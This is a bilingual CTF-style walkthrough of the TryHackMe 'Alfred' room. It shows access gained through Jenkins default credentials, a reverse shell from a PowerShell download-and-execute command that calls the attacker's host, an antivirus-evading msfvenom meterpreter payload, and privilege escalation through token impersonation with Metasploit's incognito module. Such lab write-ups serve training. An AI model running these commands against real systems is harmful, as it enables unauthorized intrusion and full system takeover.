【THM】Alfred-Practice
【THM】Alfred-Practice
hihopkcInitial Access
1 | nmap -p- -sC -sV -T4 10.10.206.74 |
1 | Nmap scan report for 10.10.206.74 |
账号为admin密码为admin
可以看到版本号Jenkins ver. 2.190.1
点击project,再点configure
填入
1 | powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.63.201:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.63.201 -Port 9001 |
apply and save
成功
Switching Shells
为了简化权限提升,让我们使用以下过程切换到 meterpreter shell。
1 | msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.63.201 LPORT=9001 -f exe -o shell-name.exe |
This payload generates an encoded x86-64 reverse TCP meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious.
创建此有效负载后,使用上一步中的相同方法将其下载到计算机
1 | powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.63.201:8000/shell-name.exe','shell-name.exe')" |
在运行此程序之前,请确保在 Metasploit 中设置了 handler
1 | use exploit/multi/handler |
1 | Start-Process "shell-name.exe" |
Privilege Escalation
现在,我们已获得初始访问权限,让我们使用令牌模拟来获取系统访问权限。
Windows 使用令牌来确保帐户具有执行特定操作的正确权限。帐户令牌在用户登录或进行身份验证时分配给帐户。这通常由 LSASS.exe 完成(将此视为身份验证过程)
This access token consists of:
- User SIDs(security identifier)
- Group SIDs
- Privileges
Amongst other things. More detailed information can be found here.
There are two types of access tokens:
- Primary access tokens: those associated with a user account that are generated on log on
- Impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
- SecurityDelegation: current user/client can impersonate the client’s security context on a remote system
Where the security context is a data structure that contains users’ relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
There’s more reading here.
使用 whoami /priv 查看所有权限
1 | C:\Program Files (x86)\Jenkins\workspace\project>whoami /priv |
We can see privileges information. “enable” is an important detail for us.
You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.
Enter: load incognito to load the incognito module in Metasploit. Please note that you may need to use the use incognito command if the previous command doesn’t work. Also, ensure that your Metasploit is up to date.
1 | meterpreter > load incognito |
To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available.
1 | meterpreter > list_tokens -g |
Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators’ token. What is the output when you run the getuid command?
1 | meterpreter > impersonate_token "BUILTIN\Administrators" |
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
Even though you have a higher privileged token, you may not have the permissions of a privileged user (this is due to the way Windows handles permissions - it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do).
即使你拥有更高的特权令牌,你也可能没有特权用户的权限(这是由于 Windows 处理权限的方式 - 它使用进程的主令牌而不是模拟令牌来确定进程可以或不能执行的操作)。
Ensure that you migrate to a process with correct permissions (the above question’s answer). The safest process to pick is the services.exe process. First, use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
1 | meterpreter > migrate 668 |
1 | meterpreter > search -f root.txt |